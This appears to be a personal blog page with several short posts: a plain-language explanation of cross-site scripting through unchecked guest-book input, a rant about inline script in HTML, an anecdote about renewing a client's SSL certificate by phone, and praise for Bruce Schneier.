I listen regularly to security now, and there has been a lot of talk lately about cross site scripting vulnerabilities on blogs and websites.

For a more detailed writeup of what cross site scripting is than I could ever produce, check out trusty wikipedia.

Aaron's really basic overview

For a really basic overview, here it is. Basically, in html documents (such as this one) you can put client side code (javascript, generally but it can be many flavors) anywhere on the page.

You can completely mix content and code however you want.

Now, years ago, when the web was young, and pretty much a 1 to many broadcast medium. (I post content, you look at content, nothing more) this was not a problem. The only way you could make my server spit out content was to get my ftp credentials.

The problem comes when you accept content from users.. which is all the rage with the young kids ever since... 1995? ; )

So, I have a guest book on my site. If that content is not properly checked, a you could include a line of code that would kick all users that hit that web page to a porn site... or cover it in platypuses. Worse still, you could include a line of code that would have javascript send you a copy of all the user's session cookies.. which would allow you to pose as them on the website.

Not a big deal for your average blog.. but amazon.com? banking? You get the idea.

Solution: uh.. browser manufacturers?.. w3c? turn that stupid crap off!

With current html standards and practices.. there is absolutely zero need for tag attributes that execute code such as 'onclick' 'onmouseover' etc. There is also absolutely zero reason a <script> tag should ever be found mixed in with content. Most useage of both at this point is due to either backward compatibility with really old browsers, or sheer laziness.

We've got a client, named 'growingtales.com'. They do a modest amount of business on the web, and they need an SSL Certificate in order to do it. Their SSL Cert expired in October. In September I received a reminder email about renewal, and I called up their web host to renew their certificate.

I keep our client's account information in an encrypted password manager called KeePass Password Safe. So when I called up the sales people to renew the domain, I opened up the password manager and read off my 'secret word' which they use to verify me.

The nice sales person (the real humans are in sales, tech support gets their flunkies) accepted the renewal, and I told him to bill it to the card on file.

Bruce Schneier is the man. He's a really good, solid voice on current security. I'm 3/4 through his most recent book and there is not a moment reading it when i don't say, holy shit! that is so stupidly logical!

He's rather even handed when it comes to security decisions, he calls the current administration on what they've done right and what they've done wrong. (although there are cases when the wrong greatly outnumbers the right)

At any rate, here's a good example from his blog (of which i have become a daily reader)